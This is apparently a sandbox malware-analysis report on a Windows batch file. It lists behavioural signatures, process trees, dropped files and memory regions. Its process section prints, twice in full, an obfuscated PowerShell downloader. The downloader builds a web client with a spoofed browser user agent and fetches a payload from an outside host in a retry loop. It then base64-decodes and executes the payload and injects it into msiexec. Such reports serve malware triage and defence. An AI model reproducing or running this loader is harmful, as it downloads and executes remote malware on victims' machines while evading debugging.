Overview

overview

10

Static

static

1

31032025_1...at.zip

windows11-21h2-x64

31032025_1...at.zip

windows10-2004-x64

31032025_1...at.zip

windows10-ltsc_2021-x64

31032025_1...at.zip

windows11-21h2-x64

31032025_1...at.zip

android-9-x86

31032025_1...at.zip

android-13-x64

31032025_1...at.zip

macos-10.15-amd64

31032025_1...at.zip

ubuntu-18.04-amd64

31032025_1...at.zip

debian-9-armhf

31032025_1...at.zip

debian-9-mips

31032025_1...at.zip

debian-9-mipsel

2025.02.22...��.bat

windows10-2004-x64

10

2025.02.22...��.bat

windows10-2004-x64

10

2025.02.22...��.bat

windows10-ltsc_2021-x64

8

2025.02.22...��.bat

windows11-21h2-x64

10

2025.02.22...��.bat

android-9-x86

2025.02.22...��.bat

android-13-x64

2025.02.22...��.bat

macos-10.15-amd64

2025.02.22...��.bat

ubuntu-18.04-amd64

2025.02.22...��.bat

debian-9-armhf

2025.02.22...��.bat

debian-9-mips

2025.02.22...��.bat

debian-9-mipsel

Resubmissions

31/03/2025, 15:20

250331-sqqlbavny7 10

31/03/2025, 15:11

250331-skqdcsvmz2 10

Analysis

  • max time kernel
    71s
  • max time network
    120s
  • platform
    windows10-ltsc_2021_x64
  • resource
    win10ltsc2021-20250314-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
  • submitted
    31/03/2025, 15:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2025.02.222 n.ts შპს განსხვავებული.bat

  • Size

    3KB

  • MD5

    1db91aace1aac9f3e07036598aeaa98b

  • SHA1

    c8f4074759f0ea7eef262c36163db7868c6503f7

  • SHA256

    3d5032b506dcc1626efecbebb7f97ff8539200b6090fffa96ef6090d7082d249

  • SHA512

    9f5e409c1d48c3fddb13085949a4141962000fcf45614cf6feff841d6331adec33cfd95d9836761436e6fed4b87136d730396da9ac89c065fe76f264b5d98de4

Score
8/10
discoveryexecution

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2025.02.222 n.ts შპს განსხვავებული.bat" bcdedit /c set delete /r readonly /f force /t 2
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2124
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "Get-Service;$Offshore='func';Get-History;$Offshore+='t';Get-History;$Offshore+='i';$trkrudens=Get-History;$Offshore+='on:';(ni -p $Offshore -n Harpendes -value { param($Ventepositionen);$Tropikfronternes=1;do {$Intellekt185+=$Ventepositionen[$Tropikfronternes];$Tropikfronternes+=2} until(!$Ventepositionen[$Tropikfronternes])$Intellekt185});(ni -p $Offshore -n Metabolisms -value {param($Sandwichs);.($Forbrugsforeningernes) ($Sandwichs)});ConvertTo-Html;$photophone=Harpendes ' n e T .,w';$photophone+=Harpendes '.EPbucTl iBE NCt';$Overhngets=Harpendes ' M oEzOi l l a /';$Tradeswomen=Harpendes ' T lBsD1 2';$Folkeregistrets='S[,NIe t,. s e RMvkI cCe p oNi N TaM.AEN.a G e r ]S: : S e cOU.RmI tmyFpBR oTT oCC o.LA=L$ T R aHd.Ecs w o M eFN';$Overhngets+=Harpendes ',5U.,0S H(SW i.nHdPoAwFsD FNGTB 1 0D.V0C; VW iBn 6a4 ; x 6N4.;K ,rTvS:,1C3 4A.B0 ) G e c k,o /U2A0C1 0 0U1A0K1 PFMibrPe,f oMx / 1 3B4 .c0';$Fails=Harpendes '.uHsSeAR -FA G ESN.T';$velkendtes=Harpendes ' hGt t pAsS:B/ / a fTlSa c l,t dD.GtGotp / L yhc.iFnUeD.Ml zPh';$Shippingelev=Harpendes ' >';$Forbrugsforeningernes=Harpendes 'IIDELX';$Brndborerens='Hjlpemotorernes';$Smrrebrdssedlernes='\Epikureres.Sup';Metabolisms (Harpendes 'Z$CG lSO b,a,l : BGE k eFn D,E lTs EVSFs KARdI,f t E r,sT=R$OE n,V : AHpFpEDMa TbAR+,$SS,mVR rOEPBPr.dPS SIEDd l EVr N.e.S');Metabolisms (Harpendes 'M$ G lOOEB aBLD:FSTQSU IATK=B$ vSe,LNK ePN DNtdE s .vs,PclgiKt (M$ S h i PMPSIMnSg,e LPEVVU)');Metabolisms (Harpendes $Folkeregistrets);$velkendtes=$Squit[0];$Arbejdsregler=(Harpendes ' $ GBl.oSb a,Lc:Gd E f L e cMTVi.O nKIKS,EPs.2F0 =KnUECWE-mOBb jAe,CstE UsSY S.t EPM,. $AP.h O T o,P,H,O n E');Metabolisms ($Arbejdsregler);Metabolisms (Harpendes 'A$HDUesfol.eTcdt,iBo nSiMsBers 2K0S. HZeLaFd eJrSsJ[t$ FLaPi lGsR],= $BO v e rRh nTgNeMtUs');$Botcherly=Harpendes ' $ DTe.f lbe cetAi oPn i sFe sE2S0D.BDPoSwLnAl,o a d FBiClCeF(P$Pv e,l k e n d tAeIsK,C$sF eNtFt iKc u.s )';$Fetticus=$Bekendelsesskrifters;Metabolisms (Harpendes 's$HG L,o b a lP:BDPy S mCO RhFCITS TFiRS Ku= (MT ETSAT,- P A TAH $ FpEStKtOi.C u,sA)');while (!$Dysmorfistisk) {Metabolisms (Harpendes 'R$TgDlKoTbFa l :TKDe e sMh.oPn dLs.=H$ S kGaSr nPsCuNn g eprTn e') ;Metabolisms $Botcherly;Metabolisms (Harpendes 'g[ T h rBE a D i,NCg .ST HXr E a.dN]P: :PsGLTe e P,(K4A0 0 0 )');Metabolisms (Harpendes 'R$ GSL,OGbCa lA:Sd ySsSMCO,RPfOI.sst IUSFkP= (STOE S t,-FPHATtOHA D$,fFE t t iNC uTs )') ;Metabolisms (Harpendes ',$ g lao b A l : N.iVG hGt s =,$fgBlNoEbPAUl.: O,pSdSAbt EErMIKnKGKs S.IKd E r NCEKs + + % $SSWQSUUIUtT..C o uFNST') ;$velkendtes=$Squit[$nights]}$Floristics=404568;$Excruciates=26946;Metabolisms (Harpendes ' $ gFl,O B A,LS:BtSoDd d YSS KSeBeIR nteRs =. GMEAt -SCEO n.tKE N TA $,fRE,t T i c U s');Metabolisms (Harpendes ' $,gslHo b a l :ROLgSe org,r.aap hDi cHaBlBl yK =F O[VSKyTs t eTm . C oknUv e r t ] :.:OF r o mSBUaSsMeA6B4NS t r iBn gd(A$PT o d d y s,keeFe.r nAe s,)');Metabolisms (Harpendes 'P$ gSlAo b A l : K l.aBGGe T. = P[CS Y S tMe mS.St EFX t .SE n cNo D i.nUG.]L:S:,A SKC IMIS.,GbEptPS t.R,i.N Gm(,$.OBG e,oAG r a P,HSitc,a L l y )');Metabolisms (Harpendes 'A$ GFl.opbAa,L.: NkU MmmFEUr E R e =A$WK lAaJGAE.tH..SOUVbSs t RKI n,gP(k$ FcLwOPr iUSNtPiCC.sD,,$LEBXSC RAUEcOI aATSe s )');Metabolisms $Nummerere;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2404
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Offshore='func';Get-History;$Offshore+='t';Get-History;$Offshore+='i';$trkrudens=Get-History;$Offshore+='on:';(ni -p $Offshore -n Harpendes -value { param($Ventepositionen);$Tropikfronternes=1;do {$Intellekt185+=$Ventepositionen[$Tropikfronternes];$Tropikfronternes+=2} until(!$Ventepositionen[$Tropikfronternes])$Intellekt185});(ni -p $Offshore -n Metabolisms -value {param($Sandwichs);.($Forbrugsforeningernes) ($Sandwichs)});ConvertTo-Html;$photophone=Harpendes ' n e T .,w';$photophone+=Harpendes '.EPbucTl iBE NCt';$Overhngets=Harpendes ' M oEzOi l l a /';$Tradeswomen=Harpendes ' T lBsD1 2';$Folkeregistrets='S[,NIe t,. s e RMvkI cCe p oNi N TaM.AEN.a G e r ]S: : S e cOU.RmI tmyFpBR oTT oCC o.LA=L$ T R aHd.Ecs w o M eFN';$Overhngets+=Harpendes ',5U.,0S H(SW i.nHdPoAwFsD FNGTB 1 0D.V0C; VW iBn 6a4 ; x 6N4.;K ,rTvS:,1C3 4A.B0 ) G e c k,o /U2A0C1 0 0U1A0K1 PFMibrPe,f oMx / 1 3B4 .c0';$Fails=Harpendes '.uHsSeAR -FA G ESN.T';$velkendtes=Harpendes ' hGt t pAsS:B/ / a fTlSa c l,t dD.GtGotp / L yhc.iFnUeD.Ml zPh';$Shippingelev=Harpendes ' >';$Forbrugsforeningernes=Harpendes 'IIDELX';$Brndborerens='Hjlpemotorernes';$Smrrebrdssedlernes='\Epikureres.Sup';Metabolisms (Harpendes 'Z$CG lSO b,a,l : BGE k eFn D,E lTs EVSFs KARdI,f t E r,sT=R$OE n,V : AHpFpEDMa TbAR+,$SS,mVR rOEPBPr.dPS SIEDd l EVr N.e.S');Metabolisms (Harpendes 'M$ G lOOEB aBLD:FSTQSU IATK=B$ vSe,LNK ePN DNtdE s .vs,PclgiKt (M$ S h i PMPSIMnSg,e LPEVVU)');Metabolisms (Harpendes $Folkeregistrets);$velkendtes=$Squit[0];$Arbejdsregler=(Harpendes ' $ GBl.oSb a,Lc:Gd E f L e cMTVi.O nKIKS,EPs.2F0 =KnUECWE-mOBb jAe,CstE UsSY S.t EPM,. $AP.h O T o,P,H,O n E');Metabolisms ($Arbejdsregler);Metabolisms (Harpendes 'A$HDUesfol.eTcdt,iBo nSiMsBers 2K0S. HZeLaFd eJrSsJ[t$ FLaPi lGsR],= $BO v e rRh nTgNeMtUs');$Botcherly=Harpendes ' $ DTe.f lbe cetAi oPn i sFe sE2S0D.BDPoSwLnAl,o a d FBiClCeF(P$Pv e,l k e n d tAeIsK,C$sF eNtFt iKc u.s )';$Fetticus=$Bekendelsesskrifters;Metabolisms (Harpendes 's$HG L,o b a lP:BDPy S mCO RhFCITS TFiRS Ku= (MT ETSAT,- P A TAH $ FpEStKtOi.C u,sA)');while (!$Dysmorfistisk) {Metabolisms (Harpendes 'R$TgDlKoTbFa l :TKDe e sMh.oPn dLs.=H$ S kGaSr nPsCuNn g eprTn e') ;Metabolisms $Botcherly;Metabolisms (Harpendes 'g[ T h rBE a D i,NCg .ST HXr E a.dN]P: :PsGLTe e P,(K4A0 0 0 )');Metabolisms (Harpendes 'R$ GSL,OGbCa lA:Sd ySsSMCO,RPfOI.sst IUSFkP= (STOE S t,-FPHATtOHA D$,fFE t t iNC uTs )') ;Metabolisms (Harpendes ',$ g lao b A l : N.iVG hGt s =,$fgBlNoEbPAUl.: O,pSdSAbt EErMIKnKGKs S.IKd E r NCEKs + + % $SSWQSUUIUtT..C o uFNST') ;$velkendtes=$Squit[$nights]}$Floristics=404568;$Excruciates=26946;Metabolisms (Harpendes ' $ gFl,O B A,LS:BtSoDd d YSS KSeBeIR nteRs =. GMEAt -SCEO n.tKE N TA $,fRE,t T i c U s');Metabolisms (Harpendes ' $,gslHo b a l :ROLgSe org,r.aap hDi cHaBlBl yK =F O[VSKyTs t eTm . C oknUv e r t ] :.:OF r o mSBUaSsMeA6B4NS t r iBn gd(A$PT o d d y s,keeFe.r nAe s,)');Metabolisms (Harpendes 'P$ gSlAo b A l : K l.aBGGe T. = P[CS Y S tMe mS.St EFX t .SE n cNo D i.nUG.]L:S:,A SKC IMIS.,GbEptPS t.R,i.N Gm(,$.OBG e,oAG r a P,HSitc,a L l y )');Metabolisms (Harpendes 'A$ GFl.opbAa,L.: NkU MmmFEUr E R e =A$WK lAaJGAE.tH..SOUVbSs t RKI n,gP(k$ FcLwOPr iUSNtPiCC.sD,,$LEBXSC RAUEcOI aATSe s )');Metabolisms $Nummerere;"
    1⤵
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1760
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:228

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    0e522fcd6ac54dc930a24f50a9b76dab

    SHA1

    54bbd1ae5164a6dd5a8c8714b645ded484dbab84

    SHA256

    32a62873fb8c660a249e8dddd3ce98d3867dbaca668065f132113f04fee2f115

    SHA512

    44267dd796b072ba94c0186662b0c4ea537987b8e8796a512507131fc600bf17e95b7ac473883141607da0c0fc23f4e0e2f8253f1af83392621b50f1e3c64726

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nmhzwqbo.35d.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Epikureres.Sup
    Filesize

    561KB

    MD5

    fe566224082e2fd8765e323a73a2d9f2

    SHA1

    86a2fd4c14b36fc636efdfa6713ba3a3ae149937

    SHA256

    52de732643d3945e5e12154ea8dd7f8643419e5432b8ee9059c32c250532f772

    SHA512

    2c7c37d9c1cebc9915b082e0db60a41b8afffba7d6e35c115fa2ee98a0ac3f7fc28b5e55f019da852d4a7597644f0587fa370233f59101d37e7db303f06c4886

    Download Submit

  • memory/1760-41-0x00000000060B0000-0x00000000060FC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1760-51-0x0000000074500000-0x0000000074CB1000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1760-62-0x0000000074500000-0x0000000074CB1000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1760-60-0x0000000074500000-0x0000000074CB1000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1760-21-0x000000007450E000-0x000000007450F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1760-22-0x00000000049B0000-0x00000000049E6000-memory.dmp

    Filesize

    216KB

    Download

  • memory/1760-23-0x0000000074500000-0x0000000074CB1000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1760-24-0x0000000074500000-0x0000000074CB1000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1760-25-0x0000000005220000-0x00000000058EA000-memory.dmp

    Filesize

    6.8MB

    Download

  • memory/1760-36-0x0000000005AF0000-0x0000000005B56000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1760-37-0x0000000005B60000-0x0000000005BC6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1760-35-0x00000000059F0000-0x0000000005A12000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1760-59-0x0000000074500000-0x0000000074CB1000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1760-39-0x0000000005BD0000-0x0000000005F27000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1760-40-0x0000000006000000-0x000000000601E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1760-58-0x0000000074500000-0x0000000074CB1000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1760-43-0x0000000006570000-0x000000000658A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/1760-57-0x0000000074500000-0x0000000074CB1000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1760-54-0x0000000074500000-0x0000000074CB1000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1760-45-0x0000000007610000-0x0000000007BB6000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/1760-46-0x0000000008240000-0x00000000088BA000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/1760-56-0x0000000074500000-0x0000000074CB1000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1760-48-0x0000000074500000-0x0000000074CB1000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1760-49-0x0000000074500000-0x0000000074CB1000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1760-50-0x0000000074500000-0x0000000074CB1000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1760-42-0x0000000006FC0000-0x0000000007056000-memory.dmp

    Filesize

    600KB

    Download

  • memory/1760-52-0x000000007450E000-0x000000007450F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1760-53-0x0000000074500000-0x0000000074CB1000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1760-44-0x00000000065C0000-0x00000000065E2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1760-55-0x00000000088C0000-0x000000000CAF4000-memory.dmp

    Filesize

    66.2MB

    Download

  • memory/2404-3-0x0000020145EC0000-0x0000020145EE2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2404-14-0x00007FFE05B60000-0x00007FFE06622000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2404-2-0x00007FFE05B63000-0x00007FFE05B65000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2404-13-0x00007FFE05B60000-0x00007FFE06622000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2404-20-0x00007FFE05B60000-0x00007FFE06622000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2404-15-0x00007FFE05B60000-0x00007FFE06622000-memory.dmp

    Filesize

    10.8MB

    Download